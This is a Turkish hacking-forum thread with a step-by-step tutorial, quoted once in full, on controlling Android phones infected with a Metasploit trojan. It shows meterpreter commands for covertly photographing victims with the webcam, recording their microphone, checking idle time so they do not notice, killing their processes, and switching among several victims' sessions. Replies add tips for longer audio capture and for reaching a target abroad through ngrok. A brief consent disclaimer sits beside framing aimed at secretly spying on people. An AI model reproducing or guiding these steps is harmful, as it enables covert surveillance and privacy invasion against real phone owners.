Trojan İle Sızdık Peki Sonra Ne Yapacağız ?

MemoryTiger

Katılımcı Üye
8 Mar 2019
446
248
21
Kali Linux
pwjwnms.png

Evet , o kadar konudan sonra artık telefonun içindeyiz :)
Ve şimdi o telefona ne yapacağımıza bakalım
öncelikle karşımıza şöyle bir yazı gelmesi lazım meterpreter >

>> burada ne yazacağız onu öğrenelim

>> öncelikle öğrenmek için help yazalım

>> Ve karşımıza tonca şey geldi. oraları kendiniz biraz inceleyin.

>> Bu kısımda fotoğraf alalım mesela örnek veriyorum adamın fotosunu çekicem. hangisini kullanmalıyım / webcam_snap

>> BUNUN İÇİN meterpreter yazan yerin devamına webcam_snap yazmam yeterli olucaktır.

1.png

>> Mesela trojanıma 3 kişi yakalandı

>> mevcut payloadı kapatmadan nasıl diğer ağlara geçiş yaparız onu anlatıcam.

>> ağ geldiğinde

Rich (BB code):
meterpreter > Background

>> yazıyoruz ve bu sürece gelen bağlantıyı arkaya atmış oluyoruz.

>> her gelen bağlantı için Background komutunu yazarak ağları arkaya almış oluyoruz. ( uzun hali )

>> meterpreter > run -j yaparsanız şunu dersiniz bağlantı geldiği gibi arka plana alınsın ben işimi görebiliyimde diyebilirsiniz yani direk bağlantının gelmesini bekleyip background yazmaktansa bu daha iyidir. ( kısa hali )

>> peki hocam bu kadar ağ var ama ? ben nasıl geçiş yaparım

>> evet bütün ağlar arkada sıra geçiş yapmakta // meterpreter > sessions // yazmanız yeterli olucaktır. bunu yazarak ağları listelemiş olursunuz.

Kod:
Id  Name  Type                  Information          Connection[/SIZE][/COLOR][/FONT][/CENTER][/SIZE][/COLOR][/FONT][/CENTER]
[FONT=verdana][COLOR=rgb(239, 239, 239)][SIZE=4][CENTER][FONT=verdana][COLOR=rgb(239, 239, 239)][SIZE=4][CENTER]
  --  ----  ----                  -----------          ----------

6         meterpreter dalvik/a  u0_***@ localhost  127.0.0.1:2005 -> 127.

ndroid                                     0.0.1:*****  (127.0.0.

7         meterpreter dalvik/a  u0_*** @ localhost  127.0.0.1:2005 -> 127.

ndroid                                     0.0.1:*****  (127.0.0.

>> Mesela benim 2 tane bağlantım var bunlara nasıl geçicem yani mesela trojanı a kişisine ve b kişisine attınız geçiş nasıl yaparız.?

>> meterpreter > sessions -i 6 "yazarsam eğer şunu demiş olurum 6 numaralı ağa geçeyim"

>> meterpreter > exit "yazarsam ağla ilişkimi kesmiş olurum."

>> sessions

>> meterpreter > session -i 7

diyerek ağlar arası geçiş yapabilirsiniz.

1.png

Biraz Eğlenelim Nedersiniz :))

meterpreter > record_mic -d 10 -f /root/Masaüstü/deneme.waw ( yazarsanız dersinizki 10 saniyelik mikrofon kaydı ) 1>x>11 en fazla 10 yapsanız daha güzel olur çünkü daha fazlası çökmeye neden oluyor kendim denedim.

meterpreter > uictl ( yazarsanız dersinizki mouse ve klavye devre dışı bırakayım ancak telefon üzerinde yaptığımız için bu işlem geçersiz )

meterpreter > idletime ( yazarsanız dersinizki bu adam ekrana ne zamandır dokunmuyor onu öğrenmek için yani telefon başında değilken işlem yapıcazki anlamasın :) )
meterpreter > ps
( yazarsanız adamın sisteminde nelerin çalıştığını görebilirsiniz )
ps yazdığınızda şunlar gelicek

Rich (BB code):
Process List                                                                                                                                                 

============

PID   Name  User

---   ----  ----

7089  sh    u0_a560

7094  ps    u0_a560

meterpreter > kill 7089 ( yazarsanız program kapanıcaktır )

meterpreter > run
( yazıp 2 3 defa tab tuşuna basmanız yeterli olucaktır. ) ve bol bol space basın

meterpreter > run ( o kodların arasından siz seçiceksiniz ) ....../...../..../.../ şöyle kodlar olucak run kısmının önünde yapıştırmanız yeterli o kodların anlamlarını vermeye kalksam işin içinden çıkamam onuda araştırarak bulabilirsiniz.

VE TABİKİ BU YAPTIKLARINIZI ARKADAŞLARINIZA TROLL AMAÇLI VE SİBER SUÇ OLMAYACAK YANİ KARŞI TARAFIN RIZASI İLE YAPMANIZ TAVSİYE EDİLİR.
YOKSA SİBER SUÇA GİRER BİZ BUNU DESTEKLEMİYORUZ. BİZ KORUYORUZ

tm6syrc.png

İYİ FORUMLAR DİLERİM

Moderatör tarafında düzenlendi:

sefilbilo23

Kıdemli Üye
3 Tem 2021
2,224
900
22
Evet , o kadar konudan sonra artık telefonun içindeyiz :)
Ve şimdi o telefona ne yapacağımıza bakalım

öncelikle karşımıza şöyle bir yazı gelmesi lazım meterpreter >

- burada ne yazacağız onu öğrenelim
- öncelikle öğrenmek için help yazalım
-Ve karşımıza tonca şey geldi. oraları kendiniz biraz inceleyin.
-Bu kısımda fotoğraf alalım mesela örnek veriyorum adamın fotosunu çekicem. hangisini kullanmalıyım / webcam_snap
-BUNUN İÇİN meterpreter yazan yerin devamına webcam_snap yazmam yeterli olucaktır.
---------------------------
-Mesela trojanıma 3 kişi yakalandı
-mevcut payloadı kapatmadan nasıl diğer ağlara geçiş yaparız onu anlatıcam.
-ağ geldiğinde

meterpreter > Background
-yazıyoruz ve bu sürece gelen bağlantıyı arkaya atmış oluyoruz.
-her gelen bağlantı için Background komutunu yazarak ağları arkaya almış oluyoruz. ( uzun hali )
-meterpreter > run -j yaparsanız şunu dersiniz bağlantı geldiği gibi arka plana alınsın ben işimi görebiliyimde diyebilirsiniz yani direk bağlantının gelmesini bekleyip background yazmaktansa bu daha iyidir. ( kısa hali )
-peki hocam bu kadar ağ var ama ? ben nasıl geçiş yaparım
-evet bütün ağlar arkada sıra geçiş yapmakta // meterpreter > sessions // yazmanız yeterli olucaktır. bunu yazarak ağları listelemiş olursunuz.

Id Name Type Information Connection
-- ---- ---- ----------- ----------
6 meterpreter dalvik/a u0_***@ localhost 127.0.0.1:2005 -> 127.
ndroid 0.0.1:***** (127.0.0.

7 meterpreter dalvik/a u0_*** @ localhost 127.0.0.1:2005 -> 127.
ndroid 0.0.1:***** (127.0.0.
-Mesela benim 2 tane bağlantım var bunlara nasıl geçicem yani mesela trojanı a kişisine ve b kişisine attınız geçiş nasıl yaparız.?
- meterpreter > sessions -i 6 "yazarsam eğer şunu demiş olurum 6 numaralı ağa geçeyim"
- meterpreter > exit "yazarsam ağla ilişkimi kesmiş olurum."
- sessions
- meterpreter > session -i 7

diyerek ağlar arası geçiş yapabilirsiniz.
---------------------------
Biraz Eğlenelim Nedersiniz :))

meterpreter > record_mic -d 10 -f /root/Masaüstü/deneme.waw ( yazarsanız dersinizki 10 saniyelik mikrofon kaydı ) 1>x>11 en fazla 10 yapsanız daha güzel olur çünkü daha fazlası çökmeye neden oluyor kendim denedim.
meterpreter > uictl ( yazarsanız dersinizki mouse ve klavye devre dışı bırakayım ancak telefon üzerinde yaptığımız için bu işlem geçersiz )
meterpreter > idletime ( yazarsanız dersinizki bu adam ekrana ne zamandır dokunmuyor onu öğrenmek için yani telefon başında değilken işlem yapıcazki anlamasın :) )
meterpreter > ps ( yazarsanız adamın sisteminde nelerin çalıştığını görebilirsiniz )
ps yazdığınızda şunlar gelicek

Process List
============

PID Name User
--- ---- ----
7089 sh u0_a560
7094 ps u0_a560
meterpreter > kill 7089 ( yazarsanız program kapanıcaktır )
meterpreter > run ( yazıp 2 3 defa tab tuşuna basmanız yeterli olucaktır. ) ve bol bol space basın
meterpreter > run ( o kodların arasından siz seçiceksiniz ) ....../...../..../.../ şöyle kodlar olucak run kısmının önünde yapıştırmanız yeterli o kodların anlamlarını vermeye kalksam işin içinden çıkamam onuda araştırarak bulabilirsiniz.

VE TABİKİ BU YAPTIKLARINIZI ARKADAŞLARINIZA TROLL AMAÇLI VE SİBER SUÇ OLMAYACAK YANİ KARŞI TARAFIN RIZASI İLE YAPMANIZ TAVSİYE EDİLİR.
YOKSA SİBER SUÇA GİRER BİZ BUNU DESTEKLEMİYORUZ. BİZ KORUYORUZ

İYİ FORUMLAR DİLERİM
Orda şunu demişsin 10 saniyelik dinleme aslında cökmuyor bilgisayar ve telefon arası bağlantı wi-fi olduğu için o apk UZATILDI trojen fazla veri alamiyor ve almadığı için çökme meydana geliyor bunu şöyle yap

5G wi-fi ye bağlan daha sonra usb sadece kali linux uyumlu olucak 5G bir usb al daha sonra bu usb kali linuxa uyumlu olduğu için ona göre hareket et daha sonra trojeni yap 5G bir bağlatıya gönder arasındaki bağlantı kopmicaktır 30 saniye kadar konuşma sağliyabilirsin eline sağlık bu arada

MemoryTiger

Katılımcı Üye
8 Mar 2019
446
248
21
Kali Linux
Orda şunu demişsin 10 saniyelik dinleme aslında cökmuyor bilgisayar ve telefon arası bağlantı wi-fi olduğu için o apk UZATILDI trojen fazla veri alamiyor ve almadığı için çökme meydana geliyor bunu şöyle yap

5G wi-fi ye bağlan daha sonra usb sadece kali linux uyumlu olucak 5G bir usb al daha sonra bu usb kali linuxa uyumlu olduğu için ona göre hareket et daha sonra trojeni yap 5G bir bağlatıya gönder arasındaki bağlantı kopmicaktır 30 saniye kadar konuşma sağliyabilirsin eline sağlık bu arada
Hocam Eline Sağlık Bilgi İçin Teşekkür Ederim. :)
Peki Bağlantıyı Hollanda daki arkadaşıma attığımda tıklamanın bilgisi geliyor ancak session kapanıyor neden olabilir ?
Saolasın :)
Eline emeğine sağlık.
Çok Teşekkür Ederim :))

MemoryTiger

Katılımcı Üye
8 Mar 2019
446
248
21
Kali Linux
Bu bazı ülkeler arası anlaşma var örneğin diktatör bi ülkede bu ngrok kullanması yasak her ülkenın kısıtlaması var yani ngrok kullanmak icin ise o ngrok olarak kendini tercube etmen lazım ama bilemem belki başka bişey de olabilir
arkadaşım ngrok ile minecraft serveri açmıştı demekki başka bir sıkıntı var. bu konu hakkında bilgisi olan biri yardımcı olsa fena olmazdı :D

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.